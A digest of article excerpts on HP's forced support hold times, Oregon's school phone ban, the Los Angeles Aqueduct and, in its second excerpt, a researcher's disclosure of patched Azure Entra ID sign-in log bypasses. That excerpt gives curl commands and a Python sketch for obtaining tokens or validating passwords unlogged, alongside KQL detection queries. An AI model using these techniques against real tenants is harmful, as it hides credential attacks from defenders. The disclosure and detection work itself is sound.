In an odd approach to trying to improve customer tech support, HP allegedly implemented mandatory, 15-minute wait times for people calling the vendor for help with their computers and printers in certain geographies.
Callers from the United Kingdom, France, Germany, Ireland, and Italy were met with the forced holding periods, The Register reported on Thursday. The publication cited internal communications it saw from February 18 that reportedly said the wait times aimed to “influence customers to increase their adoption of digital self-solve, as a faster way to address their support question. This involves inserting a message of high call volumes, to expect a delay in connecting to an agent and offering digital self-solve solutions as an alternative.”
Even if HP’s telephone support center wasn’t busy, callers would reportedly hear:
We are experiencing longer waiting times and we apologize for the inconvenience. The next available representative will be with you in about 15 minutes.
To quickly resolve your issue, please visit our website support.hp.com to check out other support options or find helpful articles and assistant to get a guided help by visiting virtualagent.hpcloud.hp.com.
Callers were then told to “please stay on the line” if they wanted to speak to a representative. The phone system was also set to remind customers of their other support options and to apologize for the long (HP-induced) wait times upon the fifth, 10th, and 13th minute of the call.
The mandatory support call times have been lifted, per a company statement shared by HP spokesperson Katie Derkits:
We’re always looking for ways to improve our customer service experience. This support offering was intended to provide more digital options with the goal of reducing time to resolve inquiries. We have found that many of our customers were not aware of the digital support options we provide. Based on initial feedback, we know the importance of speaking to live customer service agents in a timely fashion is paramount. As a result, we will continue to prioritize timely access to live phone support to ensure we are delivering an exceptional customer experience.
HP didn’t immediately clarify when it removed the wait times. Some HP workers were reportedly unhappy with the mandatory hold times, with an anonymous “insider” in HP’s European operations telling The Register, per its Thursday report: “Many within HP are pretty unhappy [about] the measures being taken and the fact those making decisions don’t have to deal with the customers who their decisions impact.”
...
Read the original on arstechnica.com »
Nyxgeek here. It’s 2026 and I’ve got two more Azure Entra ID sign-in log bypasses to share with you. Don’t get too excited…these bypasses were recently fixed, but I think it’s important that people know.
By sending a specially crafted login attempt to the Azure authentication endpoint, it was possible to retrieve valid tokens without the activity appearing in the Entra ID sign-in logs. This is critical logging…logging that administrators across the world rely on to detect intrusions…logging that could be made optional.
Today I will walk you through the third and fourth Azure sign-in log bypasses that I have found in the last three years. I will also look at how sign-in log bypasses can be detected using KQL queries. By knowing about Microsoft’s past mistakes, we can try to prepare for their future failures.
Since 2023, I’ve uncovered four Azure Entra ID sign-in log bypasses. This means I’ve found four completely different ways to validate an Azure account’s password without it showing up in the Azure Entra ID sign-in logs. While the first two of these merely confirmed whether a password was valid without generating a log, my latest logging bypasses returned fully functioning tokens.
Previously, I had written about GraphNinja and GraphGhost — two logging bypasses where a user could identify valid passwords without generating any ‘successful’ events in the sign-in logs. Neither were overly complicated. You can find blog posts describing them in detail here and here.
Real quick — a point of clarification on the names: while I’ve used Graph- prefix to designate these different bypasses, perhaps it would have been more appropriate to prefix them Entra-, as they were not limited to only Graph sign-ins.
In each of these, the logging being bypassed is for the Azure Entra ID sign-in logs. Logon method is via an HTTP POST to the Entra ID token endpoint, login.microsoftonline.com, using the OAuth2 ROPC flow, with the Graph API as our intended resource/scope. We submit a username and password, an Application ID, and a target resource/scope, and we’ll get a bearer token or refresh token for the Graph API in return.
An example curl command performing a “normal” authentication can be seen below:
curl -X POST "https://login.microsoftonline.com/00000000-1234-1234-1234-000000000000/oauth2/v2.0/token" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  --data-urlencode "client_id=f05ff7c9-f75a-4acd-a3b5-f4b6a870245d" \
  --data-urlencode "client_info=1" \
  --data-urlencode "grant_type=password" \
  --data-urlencode "[email protected]" \
  --data-urlencode "password=secretpassword123" \
  --data-urlencode "scope=https://graph.microsoft.com/.default"
When a valid username and password are supplied, a token is returned that can be used to access the Graph API.
In the GraphNinja bypass, it was only necessary to target another tenant with the authentication attempt (e.g., https://login.microsoftonline.com/00000000-1234-1234-1234-000000000000/oauth2/v2.0/token). Any other valid tenant GUID would do, as long as it wasn’t your victim’s. The authentication response would still indicate if a valid password was found, but the login would fail because it was performed against a foreign tenant where the user didn’t exist. No failed or successful authentication log was generated within the parent tenant of the actual user, as the authentication was targeting the foreign tenant. No logs were generated on the foreign tenant because only logs for valid users within that tenant are generated, and the target user did not exist within the foreign tenant. While no token was returned by GraphNinja, it would indicate to an attacker whether the password was valid without the attempt appearing in logs. Additional logging was added by Microsoft to remediate this oversight.
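As an illustration only, here is a sketch of how that signal could have been read, written in Python rather than curl. The tenant GUID, client ID, and credentials are placeholders, and the mapping of AADSTS error codes to outcomes is an assumption based on the earlier GraphNinja write-up; since Microsoft's remediation, this distinction is no longer usable this way.

import requests

FOREIGN_TENANT = "00000000-1234-1234-1234-000000000000"  # any valid tenant other than the victim's
CLIENT_ID = "f05ff7c9-f75a-4acd-a3b5-f4b6a870245d"       # same public client ID as the curl example

def check_password(username, password):
    resp = requests.post(
        f"https://login.microsoftonline.com/{FOREIGN_TENANT}/oauth2/v2.0/token",
        data={
            "client_id": CLIENT_ID,
            "grant_type": "password",
            "username": username,
            "password": password,
            "scope": "https://graph.microsoft.com/.default",
        },
    )
    desc = resp.json().get("error_description", "")
    # Assumed mapping: "user not found in this tenant" implies the password was accepted upstream,
    # while "invalid username or password" implies it was not.
    if "AADSTS50034" in desc:
        return "password likely valid (the user simply does not exist in the foreign tenant)"
    if "AADSTS50126" in desc:
        return "password invalid"
    return "inconclusive: " + desc[:80]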
With the GraphGhost bypass, providing an invalid Client ID value would cause the overall authentication flow to fail, but not until after credential validation had occurred. By providing an invalid value for the Client ID, it would fail a post-password-validation step, the overall authentication flow would fail, and this would show to administrators as a failed login, with no indication in logs that the password had been successfully guessed. Like GraphNinja, no token was returned, but the password was validated without any indication to the admin. This issue was fixed by Microsoft with the addition of details in the sign-in logs to indicate whether the password was successful.
Now that you’re caught up on what’s been found in 2023 and 2024, let’s look at the findings from 2025.
Let’s start with what I’m terming GraphGoblin. I stumbled across this bypass while poking at the parameters in the Microsoft authentication POST. Testing the scope parameter, I first tried some simple things like supplying invalid scope values. However, I found that the scope value would be rejected if it wasn’t a valid scope name, or didn’t match an expected format.
AADSTS70011: The provided request must include a ‘scope’ input parameter. The provided value for the input parameter ‘scope’ is not valid. The scope [scope] is not valid. The scope format is invalid. Scope must be in a valid URI form
This error message isn’t 100% honest. You can also just specify specific scopes, such as openid or Directory.Read.All. If the URL or GUID format is used, it will validate the resource being targeted, and then the scope. This validation of the scope values prevented arbitrarily long strings from being evaluated.
Or did it? What if the string we submitted WAS valid, but repeating? For instance, instead of specifying a value like openid as the scope, what if we submitted a bunch of the same value, like openid openid openid?
It got through! But did it work at bypassing the logs? I set an alarm for 15 minutes, came back, and checked the Azure Entra ID sign-in logs, and found NO NEW SIGN-INS! W00t! I waited another 15 minutes before really celebrating. Then I tested it with a friend’s tenant, just to be sure. It was a solid bypass.
To show how dead-simple this is, a demonstration of this bypass using curl and Bash expansion can be found below:
export TENANT_ID="[tenant-guid-goes-here]"

curl -X POST "https://login.microsoftonline.com/${TENANT_ID}/oauth2/v2.0/token" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  --data-urlencode "client_id=f05ff7c9-f75a-4acd-a3b5-f4b6a870245d" \
  --data-urlencode "client_info=1" \
  --data-urlencode "grant_type=password" \
  --data-urlencode "[email protected]" \
  --data-urlencode "password=secretpassword123" \
  --data-urlencode "scope=$(for num in {1..10000}; do echo -n 'openid '; done)"
There is no way of knowing 100% why this worked without Microsoft publishing information about these issues, but I can take a guess.
Having done a fair bit of logging to databases with various scripts, I believe this was a simple matter of overflowing the SQL column length for a field, causing the entire INSERT to fail. This is a common beginner mistake when you first start to work with databases.
It’s likely that the parser iterated over the list of scopes included, did not find any invalid ones, and so allowed the repetitive entry through, then attempted to log the raw list of openid openid openid…, in its entirety, overflowing that SQL column’s limit. In testing, a reasonable maximum length to plan for might be assumed to be the sum of the lengths of all possible scope names. Perhaps they tested for that scenario but never anticipated the repeats. At any rate, if this was the case, they failed to perform simple tests against user-supplied data.
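Purely to illustrate that hypothesis (this is a toy model, not Microsoft's pipeline), here is a sketch in which an oversized field makes the log INSERT fail and a swallowed exception silently drops the sign-in event:

import sqlite3

# Toy stand-in for a sign-in log table with a bounded scope column.
db = sqlite3.connect(":memory:")
db.execute("""
    CREATE TABLE signin_logs (
        username TEXT,
        scope    TEXT CHECK (length(scope) <= 1000)  -- hypothetical column limit
    )
""")

def log_signin(username, scope):
    try:
        db.execute("INSERT INTO signin_logs VALUES (?, ?)", (username, scope))
        db.commit()
    except sqlite3.IntegrityError:
        # If the logging layer swallows the failure instead of truncating and retrying,
        # the authentication still succeeds but leaves no trace in the table.
        pass

log_signin("alice", "openid")             # logged normally
log_signin("alice", "openid " * 10_000)   # INSERT fails, event silently dropped

print(db.execute("SELECT count(*) FROM signin_logs").fetchone()[0])  # prints 1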
If Microsoft wants to speak publicly about this, I’d love to hear more on it, and to know more about how they approach internal security reviews of their most-critical products.
It’s not often that you see a demo of an actual Azure vulnerability, as they get patched and are gone forever. However, because Microsoft was having trouble replicating this complicated bypass, and asked for a video, I come bearing receipts.
For your viewing pleasure, I present to you what is probably the only Azure sign-in log bypass you’ll ever see:
In the following demo I am about to perform a series of three login attempts.
The first attempt will be a failed login that generates a normal failed sign-in log. This failed sign-in also generates a ‘Correlation ID’ that we can use as a reference point in our logs. In the second attempt, I’ll authenticate using the GraphGoblin sign-in log bypass technique. Then, I’ll make one final normal failed attempt, so we have another Correlation ID as a marker.
If all of these attempts are properly logged, the sign-in logs should show a failed login, then a successful login, then another failed login.
Below is a screenshot of the Entra ID sign-in logs. Note the Correlation ID of the last log, and the time. It is dated 9/20/2025, at 1:49:20 PM, with a Correlation ID starting with 1dfe62e9-.
In the screenshot below, you can see the source of that failed login; note that the time and Correlation ID match.
In the above image, below the failed login, you can see a valid login and a timestamp. The valid login occurs on 9/20/2025 at 13:52:38. The difference is, this time, I’m using the GraphGoblin bypass that will make this login event invisible. The login is successful and we can see a bearer token is returned.
In the following screenshot, I export the token to the variable TOKEN so we can easily use it with curl. I then demonstrate that the token is valid by making a Graph API request with it.
Now, to make it clear when reviewing logs, I’m going to make an invalid login attempt, without the bypass. This will give us a Correlation ID to use as another marker point.
Note that the attempt is from 9/20/2025 at 19:01:45 and has a Correlation ID that starts with 0d5ea4f0-. As a reminder, the first failed login had a Correlation ID that starts with 1dfe62e9-.
If we wait 10 minutes for logs to ingest then review the logs, we see our Correlation ID starting with 0d5ea4f0- is directly after our previous failed login with an ID that starts with 1dfe62e9-. No successful login is shown.
I then make a NORMAL valid login, without the logging bypass, to show that logs are still flowing.
And, we can see the regular, successful authentication come in, but still no sign of the GraphGoblin method.
After I posted a video of the bypass to Twitter/X a while back, people were curious whether the events were merely not being displayed in the Azure portal GUI or whether they were truly being dropped.
Reviewing the log analytics, I can confidently say that these were dropped entirely from the sign-in logs. In the demo video, I had sent a normal request with a user-agent of MARKER 1 — BEFORE THE BYPASS. After performing multiple authentications using the logging bypasses, I sent another normal request with a user-agent of MARKER 2 — AFTER THE BYPASS. In my Log Analytics workspace, we can see that none of the bypassed sign-in logs made it to Log Analytics. Only our MARKER 1 and MARKER 2 entries are visible from our tests.
Okay, so I mentioned that I had found a FOURTH bypass. This one was ridiculously simple, and it’s related to GraphGoblin. Can you guess what logon parameter was vulnerable?
I’ll give you a hint: This field is customized regularly.
Another hint: If you were going to perform fuzzing of a critical web-based authentication system and its logging, you would DEFINITELY want to include this field in your testing.
Did you guess it? If you guessed the USER-AGENT field, you’re RIGHT!
The secret to abusing this field so that it wouldn’t generate an authentication log? You make the user-agent string really long. A total of 50,000 characters in the user-agent worked reliably. That’s it. No special trick, just a long string.
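For the curious, here is a sketch of what that request could look like with curl, assuming the same token endpoint and parameters as the earlier example; only the 50,000-character user-agent is the new ingredient, and the credential values are placeholders:

# Build a 50,000-character user-agent string
LONG_UA=$(printf 'A%.0s' {1..50000})
curl -X POST "https://login.microsoftonline.com/${TENANT_ID}/oauth2/v2.0/token" \
-A "${LONG_UA}" \
-H "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "client_id=f05ff7c9-f75a-4acd-a3b5-f4b6a870245d" \
--data-urlencode "client_info=1" \
--data-urlencode "grant_type=password" \
--data-urlencode "username=[username-goes-here]" \
--data-urlencode "password=[password-goes-here]" \
--data-urlencode "scope=openid"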
Here is a screenshot of the bypass in action:
Again, I would guess this was the result of overflowing a SQL column limit.
Here is a screenshot where I made a failed login to generate a Correlation ID that starts with c542178e:
And here is a screenshot of a search in my logs from October 09, 2025, looking for that Correlation ID in the last month’s logs. As you can see, no log with the Correlation ID was found, indicating the bypass was successful.
I discovered this on 9/28/2025, and a week later when I went back to write up a report on it, Microsoft had already fixed it! I’m not sure how they noticed and fixed this issue without also noticing and fixing GraphGoblin, but they did.
* 1/7/2025 Microsoft is unable to reproduce this so I make them a video
* 11/21/2025 Finally reproduce and start to roll out fix
* 12/1/2025 Re-escalated within MSRC re: bounty and severity, no change
What’s going on here, Microsoft?
To review, here are the parts of a logon POST that had flaws that enabled the Azure Entra ID sign-in log bypasses. I’ve compiled them into one screenshot so you can see how many login parameters have had issues identified.
This is the gatehouse that secures hundreds, even thousands, of organizations. How is it possible that so many parts of this critical feature were so woefully untested? None of the bypasses that I’ve submitted these last few years were complicated. Yet, somehow, Microsoft’s security review of Entra ID missed all of them.
Were issues introduced with AI coding? Anybody who has worked with AI for coding knows that it 100% can (and often will) drop portions of your code when revising it. Or did these issues get introduced slowly over the years? Or, have these problems all been there since the start of Azure over a decade ago? Unfortunately, we will never know. Again, I invite Microsoft to speak publicly on these repeated failings.
Four sign-in log bypasses in the last three years, for what is arguably the most important log of all of Azure. This doesn’t bode well for admins who rely on these logs as a source of truth. So what can you do, short of moving back to on prem? Well, if you shell out the cash for an E5 license, you can still detect malicious activity, in spite of Microsoft’s failures.
After finding these last two bypasses, I started to see if I could identify traffic from these bypassed sessions. I had been collecting Graph activity in a Log Analytics workspace along with Sign-In logs. While reviewing logs I noticed that the Sign-In logs and the Graph Activity logs both had a Session ID field. Perfect! It should be possible to take a list of all unique Session IDs from the Graph Activity logs and find a corresponding Session ID in the sign-in logs. Any Session IDs that only show up in the Graph Activity logs, and don’t exist in any sign-in logs, must have bypassed the sign-in logs. Note for defenders: you will need an E5 license to collect the Graph Activity logs.
I started off with a simple query, ran it on my small test tenant, and voilà! I had a list of Graph activity belonging to my bypassed sessions.
However, it soon became apparent, when testing the detection with a client at a larger organization, that there was a lot of possible ‘noise’ to account for. My simple checks didn’t take into account noninteractive logins or service principal logins.
For a while, I was at an impasse. However, I soon found that somebody else had already thought of this, and had implemented it! Fabian Bader has a post covering exactly this in his fantastic write-up, Detect threats using Microsoft Graph activity logs - Part 2.
There is an entire section on finding missing sign-in logs!
This method incorporates additional sources of sign-ins that I had not, including service principals, managed identities, and noninteractive user sign-ins. Instead of joining on SessionId values, this KQL performs the join on the more fine-grained properties: MicrosoftGraphActivityLogs.SignInActivityId and SigninLogs.UniqueTokenIdentifier.
I still had a little bit of noise, but I added the MicrosoftServicePrincipalSignInLogs to the list of Sign-In sources and it mostly cleared up.
MicrosoftGraphActivityLogs
| where TimeGenerated > ago(8d)
| join kind=leftanti (union isfuzzy=true
        SigninLogs,
        AADNonInteractiveUserSignInLogs,
        AADServicePrincipalSignInLogs,
        AADManagedIdentitySignInLogs,
        MicrosoftServicePrincipalSignInLogs
    | where TimeGenerated > ago(90d)
    | summarize arg_max(TimeGenerated, *) by UniqueTokenIdentifier)
    on $left.SignInActivityId == $right.UniqueTokenIdentifier
If the above query returns false positives, you might want to experiment with matching on the broader SessionId value instead:
MicrosoftGraphActivityLogs
| where TimeGenerated > ago(8d)
| join kind=leftanti (union isfuzzy=true
SigninLogs,
AADNonInteractiveUserSignInLogs,
AADServicePrincipalSignInLogs,
AADManagedIdentitySignInLogs,
MicrosoftServicePrincipalSignInLogs
...
Read the original on trustedsec.com »
...
Read the original on gist.github.com »
Gov. Tina Kotek visited Estacada High School to hear how her cell phone ban has been going. (Staff photo: Christopher Keizur)
Gov. Tina Kotek said she chose Estacada High for her visit because of the positive things happening within the district. (Staff photo: Christopher Keizur)
There was plenty of uncertainty and debate about the effectiveness of a cell phone ban decreed by executive order last summer.
But at least in Estacada, the policy has earned two thumbs up, including approval from a “grumpy old teacher.”
Jeff Mellema is a language arts teacher at Estacada High School. He has worked in the building for 24 years, and he said the new policy that prohibits students from using their phones during the day has been a breath of fresh air.
“There is so much better discourse in my classroom, be it personal or academic,” Mellema said. “Students can’t avoid those conversations anymore with their phones.”
“This ban has brought joy back to this old, grumpy teacher,” he added with a smile.
That is the kind of feedback Gov. Tina Kotek was hoping for as she visited Estacada High School on Wednesday afternoon, March 18. Her goal was to visit classrooms, speak with administrators, and meet with students one-on-one to hear about the effectiveness of her phone policy.
“I knew when I put out the order, not everyone would love it from day one,” Gov. Kotek said. “I appreciate all the feedback today.”
“You have an amazing school. Go Rangers,” she added with a smile.
For years, educators had reported that cell phones were disruptive in classrooms and hindered effective teaching. Research supported those anecdotal claims, showing that phones undermine students’ ability to focus, even when they are just sitting on the desk, unused.
So the governor issued her executive order prohibiting cell phone use by students during the school day in Oregon’s K-12 public schools. To help implement the ban, her office worked with the Oregon Department of Education to share model policies for schools that already have prohibitions in place, as well as guidance on implementation flexibility.
“We are grateful to have Governor Kotek here today to see with her own eyes the positive effect this has had,” said Estacada Superintendent Ryan Carpenter. “We can now demand this expectation for our students’ well-being and success.”
Since that order was issued, every single public school district in Oregon has come into compliance with the ban.
“The goal is for every student to have the best opportunity to be successful,” Kotek said. “They need to know how to talk to people, learn, and go out into the world.”
The governor visited two classrooms during her trip to Estacada High — Mr. Schaenman’s history class and Mrs. Hannet’s algebra class. Gov. Kotek assured the kids that she still uses algebra in her day-to-day life, no matter how unlikely that may seem to the youngsters.
In the classrooms, she was able to take a straw poll around the cell phone ban and then get specific, direct feedback from the kids.
Overall, it was positive. The Rangers said they noticed changes in how they interact with teachers and peers. They don’t feel that “siren’s song” tug of their phones as often, and the changes are bleeding into everyday life as well, like fewer reminders to put phones away during family dinners. Before the ban, phones had also fueled bullying and online toxicity during the school day.
There are some hiccups. The students spoke about difficulties in tracking busy schedules; many athletes relied on their phones for practice times and locations. Some advanced placement kids said the overzealous monitoring programs on school laptops blocked access to resources they needed for studying and research. There is even a strange quirk with school-provided tech that prevents them from accessing their calculators.
“Maybe the filters are too strong right now,” Gov. Kotek said. “That is why we are working with the districts to best implement the policy.”
The kids also weighed in on the debate around the extent of the ban. The two options bandied about in Salem were a “bell-to-bell” policy or a classroom-only ban. The latter would allow kids to use their phones during passing periods and lunch. Several students advocated for that change.
That mirrored the debate within the Oregon legislature, which ultimately ended in a stalemate and the need for Gov. Kotek’s executive order.
“When you make a decision like this, you don’t know how it will ultimately work,” Kotek told the students. “I appreciate you adapting to the situation and making it work for you.”
While things could change in the future, the governor is pleased with the early results. The phone ban is here to stay.
Estacada School District is reveling in its status of public school “Golden Child.”
The visit from the governor is the latest feather in the cap of the rural, small district. In 2025, Estacada High had a 92.5% graduation rate. That is a stunning turnaround from a record-low of 38.5% in 2015. The district credits policies aimed at retaining talented teachers and empowering students to take a more active role in their learning.
“We are proud of these results,” Carpenter said. “This is a reflection and reward for a ton of hard work. This district literally changed its stars to be seen as a true academic powerhouse in Oregon.”
That mindset continues with the cell phone ban. Like many others, Estacada had a version of this in place before the official edict. But the governor’s push empowered administrators and teachers to fully embrace the ban.
“Any policy is only as good as the teachers who enforce it,” Carpenter said.
In crafting its policy, Estacada incorporated feedback from parents. That led to some key decisions around the cell phone ban. Rather than use pouches or lockers, students are allowed to keep their phones safely stored in their backpacks. That was for two reasons — it allows students to contact loved ones during emergencies, and many parents use phone trackers to keep tabs on their kids.
The district has also leaned on direct, immediate communication. The flow of information reaches parents directly, avoiding some of the miscommunication that occurred in the past.
“Even I’m surprised by the impact this has had,” Kotek said. “I’m thankful for the educators who took up the charge when I said we’ve got to do this.”
“We can model what Estacada is doing for other districts across the state,” she added.
Oregon voters have rejected most laws in referendums, with many decided outside November
Now’s the time to see Portland cherry blossoms in peak bloom
...
Read the original on portlandtribune.com »
[Note that this article is a transcript of the video embedded above.]
On the northern edge of Los Angeles, fresh water spills down two stark concrete chutes perched on the foothills of the San Gabriel Mountains, a place simply called The Cascades. It’s a deceptively simple-looking finish line: the end of a roughly 300-mile (or 500 km) journey from the eastern slopes of the Sierra Nevada into the city.
On November 5, 1913, tens of thousands of people climbed these hills to watch the first water arrive. When the gates finally opened, water trickled through, but that trickle quickly became a torrent. The project’s chief engineer, William Mulholland, leaned over to the mayor and shouted the line that’s been repeated ever since: “There it is, Mr. Mayor. Take it!”
That moment was profound for a lot of reasons, depending on where you live and how you feel about water rights. LA didn’t become LA by living within the limits of its local resources. Its meteoric growth into the metropolis we know was enabled by an early and extraordinary decision to reach far beyond its own watershed and pull a whole new river into town. Today, roughly a third of LA’s water comes from the Eastern Sierra through the Los Angeles Aqueduct system. That share swings with snowpack, drought, and environmental constraints, but this one piece of infrastructure helped turn a water-limited town into a world city. It’s one of the most impressive and controversial engineering projects in American history.
But to really appreciate that water in the cascades, you have to look way upstream and see what it took to get it there. It’s gravity, geology, politics, and human ambition all in a part of the state that most people never see. Let’s take a little tour so you can see what I mean. I’m Grady and this is Practical Engineering.
When most people think about aqueducts, this is what they picture: a bridge carrying water over a valley or river. And, just to be clear, these are aqueducts. But engineers often use the term more broadly to describe any type of conveyance system that carries water over a long distance from a source to a distribution point. Could be a canal, a pipe, a tunnel, or even just a ditch. In the case of the LA aqueduct, it’s all of them, plus a lot of supporting infrastructure as well.
From the center of the city, it’s about a four hour drive to the Owens River Diversion Weir. It’s not accessible to the public, but it is the official start of the LA Aqueduct, at least when it was originally built. Here, all the snowmelt and rain from a huge drainage system between the Sierra Nevada and Inyo Mountains funnel down into the Owens River, where a large concrete diversion weir peels nearly all of it out of its natural course and into a canal. This point is roughly 2,500 feet (or 750 meters) higher in elevation than the bottom of the Cascades at the downstream end, which makes it obvious why LA chose it as a source. The entire aqueduct is a gravity machine. There are no pumps pushing the water toward the city. Half a mile of elevation change feels like a lot until you realize you have to spread it out over 300 miles. It’s all achieved through careful grading and managing elevations along the way to keep the flow moving.
That care is particularly important in this upper section of the aqueduct, where the water flows in an open canal. To do this efficiently, you need a relatively constant slope from start to finish. That’s a tough thing to achieve on the surface of a bumpy earth. Following a river valley makes this easier, but you can see the twists and turns necessary to keep the aqueduct on its gentle slope toward LA.
If it seems kind of wild that a city would buy up the land and water rights from somewhere so far away, it did to a lot of the people who lived in the Owens Valley, too. A lot of the acquisitions and politics of the original LA Aqueduct were carried out in bad faith, souring relationships with landowners, ranchers, farmers, and communities in the area. The saga is full of broken promises and shady dealings. Then when the diversion started, the area dried up, disrupting the ecology of the region, making agriculture more difficult and residents even more resentful. Many resorted to violence, not against people but against the infrastructure. They vandalized parts of the aqueduct, a conflict that later became known as the California Water Wars. In one case in 1924, ranchers used dynamite to blow up a part of the canal. Later that year, they seized the Alabama Gates.
About 20 miles or 35 kilometers downstream from the diversion weir, a set of gates sits on the eastern bank of the aqueduct canal. Because it runs beside the river valley, the aqueduct captures some of the water that flows down from the surrounding mountains in addition to what’s diverted out of the Owens River, particularly during strong storms. That means it’s actually possible for the canal to overfill. The Alabama Gates serve as a spillway, allowing operators to divert water back down to the river. This also helps drain the canal for maintenance or repairs when needed.
Those Owens Valley ranchers understood exactly what the Alabama Gates controlled. Open them, and the water would run back where it had always run, down the Owens River, instead of south to Los Angeles. The resistance simmered and flared for years, but it didn’t end in the dramatic showdown at the aqueduct. Instead, it ended at a bank counter. The Inyo County Bank was run by two brothers who were also key organizers and financiers of the resistance campaign. In August 1927, an audit revealed major shortfalls and ongoing embezzlement, and the bank quickly collapsed. Residents across the valley saw their savings wiped out or frozen overnight, shattering what was left of the community’s ability to keep fighting.
The Alabama Gates weren’t just a political flashpoint though. They also marked an important dividing line in the aqueduct’s design. LA knew that even if the ranchers didn’t release the water to the river in protests, a lot of it would end up there anyway through seepage. As the canal climbed away from the valley floor and crossed more porous soil, it would naturally lose its water through the ground. So, at the Alabama Gates, the aqueduct transitions from an unlined canal to a concrete-lined channel. It’s still open to the air, so there’s no protection against evaporation or contamination, but the losses to the ground are a lot less.
This design continues for about 35 miles (or 55 kilometers) through the valley. Along the way, the aqueduct passes the remains of Owens Lake. Once a large body of water, it quickly dried up with the diversion of the Owens River. Of course, there were impacts to wildlife from the loss of water, but the bigger problem came later: dust. All the fine sediment that settled on the lakebed over thousands of years was now exposed to the hot desert sun. When the wind picked up, it filled the air with fine particulates that are dangerous to breathe. Over the years, there have been times when Owens Lake is the single largest source of dust pollution in the entire country, and LA has spent more than a billion dollars just trying to fix this problem alone. The aqueduct passing along the hillside past the lake and its challenges is a reminder that the true cost of water is often a lot more than the infrastructure it takes to deliver it.
So far, it might be obvious that this aqueduct system is pretty fragile to be making up a major part of a city’s fresh water supply. Even beyond the vandalism and political resistance, there are a lot of things that could go wrong along the way, from bank collapses, earthquakes, diversion failures, and more. That’s why Haiwee Reservoir was originally built in a narrow saddle between two hills as a kind of buffer. With a dam on either side, it stored water up so the aqueduct could keep running even during a disruption upstream. It also slowed the water down, exposing it to the hot desert sun as a natural form of UV disinfection. In the 1960s, the reservoir was reconfigured into two basins to add some flexibility. That’s because, around that time, the LA aqueduct became two. While the open-topped canal section was large enough to meet demands, the underground conduit in the next section wasn’t. So, LA built a second one in 1970 to increase the flow. If you look at this map of the Haiwee Reservoirs, you can see that water has two paths: it can flow into the second aqueduct here from the north basin, or it can pass through the Merritt Cut to the south reservoir, through the intake there, and into the first aqueduct. This setup allows for some redundancy, along with regulation and balancing of the flows between the two aqueducts. Haiwee marks the start of the long desert run, with both systems no longer in open-topped lined canals, but running underground in concrete conduits.
There are a lot of advantages to running an aqueduct in a closed conduit underground, especially one this long through a desert landscape. There’s far less evaporation and less potential for contamination. It doesn’t divide the landscape at the surface level, so there’s no need for bridges, culverts, and wildlife crossings. Going underground also offers more flexibility when it comes to topography. You don’t have to follow the contours of the surface so carefully because if you come to a hill, you can just dig a little deeper to keep the constant slope.
Of course, those benefits come with a cost. An underground conduit is more expensive than a simple channel on the surface, and not all the problems with topography are solved. This is Jawbone Canyon, one of the biggest drops for the first aqueduct. Rather than taking a major detour around it, the aqueduct descends 850 feet (or 250 meters) and then ascends back up. This type of structure is often called an inverted siphon. I’ve done a video on how these work for sewer systems, and I’ve also done a video on flood tunnels that work in a similar way, if you want to learn more after this.
Unlike the concrete conduit, which really just acts like an underground canal with a roof, this is one of the places where the water in the aqueduct is pressurized. 850 feet of water column is about 370 psi, 26 bar, or two-and-a-half Megapascals. It’s a lot of pressure. These sections of pipe had to be specially manufactured on the East Coast, where the major steel facilities were, and transported by ship because of their size. They travelled all the way around Cape Horn, since the Panama Canal was still under construction. There are actually quite a few of these siphons crossing canyons in this section of the aqueduct, but Jawbone Canyon is the biggest one.
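As a quick sanity check on that figure, assuming fresh water and the stated 850-foot (roughly 259-meter) drop: p = ρgh ≈ 1000 kg/m³ × 9.81 m/s² × 259 m ≈ 2.54 MPa, which works out to about 25.4 bar or 368 psi.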
A little further downstream, the LA aqueduct crosses the California Aqueduct, part of the State Water Project. That system has a connection to LA as well, but this branch at the crossing actually heads to Silverwood Lake. However, there is a transfer facility, recently completed, that can pump water out of the California Aqueduct directly into the first LA aqueduct. This creates opportunities for LA to buy water that moves through the state system and offers some flexibility in where that water ends up. There’s also a turn-in that can move water from the LA aqueduct into the California aqueduct for situations where trades make sense. The second LA aqueduct passes underneath the state canal here. And this is a good example of the differences between the first project (built in the 1910s) and the second one, built in the 1960s. Over that time, the price of labor went up a lot more than the price of materials. Where the first one carefully followed the existing topography with bends and turns to minimize the need for expensive pressurized pipe, the second one could take a more direct path, reducing labor in return for the more specialized conduit materials.
After wandering more than a hundred miles (or 160 kilometers) apart, the two Los Angeles Aqueducts come back together at Fairmont Reservoir, in the northern foothills of the Sierra Pelona Mountains. This is the last major topographic barrier on the way to Los Angeles. There was no way to go up and over without pumps, so instead they went straight through. The largest project was the Elizabeth tunnel.
Here, the two aqueducts come together again into a single watercourse. About 5 miles or 8 kilometers of excavation through everything from hard rock to loose, wet ground became one of the most difficult parts of the entire project. The tunnel required continuous temporary supports along most of its length, followed by a permanent concrete lining. It was a monumental effort for its time, and it wasn’t only essential for crossing the range: the Elizabeth Tunnel also delivers water under pressure to San Francisquito Power Plant Number 1.
This is the largest of the eight hydroelectric plants that run along the aqueduct, capturing some of the energy from the water as it flows downward toward LA. These plants are a major part of how the project paid for itself, and they continue to serve as an important source of electricity in the region today.
Continuing downstream, Bouquet Canyon reservoir adds another layer of operational flexibility. It helps regulate flow through the power plants and provides additional storage, a sort of insurance policy since this whole reach depends on a single major tunnel crossing the San Andreas Fault. In case of a major earthquake, it’d be best if Angelinos could avoid a simultaneous water shortage.
The aqueduct splits again just upstream of the San Francisquito Plant Number 2, which was famously destroyed by the St. Francis Dam failure. That reservoir project was designed to supplement the storage capacity along the aqueduct, but the dam failed catastrophically in 1928, just 2 years after it was completed, killing more than 400 people and destroying several parts of the aqueduct as well. The tragedy was one of the worst engineering disasters in American history. It put another stain on the aqueduct project, and it effectively ruined the reputation of William Mulholland, who was largely considered a hero in LA for all his work on the aqueduct and the city’s water system. The dam was never rebuilt, but workers restored the aqueduct to functioning service in only 12 days.
At Drinkwater Reservoir, the two aqueducts run roughly parallel through the Santa Clarita area, sometimes aboveground and sometimes below, before finally reaching the terminal structures that carry water into LA. Usually, the water stays in the conduits, which feed the two hydropower plants at the foot of the mountains. If the plants are out of service or there’s more flow than they can handle, you see excess water thundering through the cascade structures instead.
From here, the aqueduct drops out of the mountains and into the north end of the San Fernando Valley, where the water is treated and prepared for distribution. After filtration and disinfection, it’s stored in the Los Angeles Reservoir, the system’s terminal reservoir, so the city can smooth out day-to-day swings in demand even while the aqueduct’s inflow stays relatively steady.
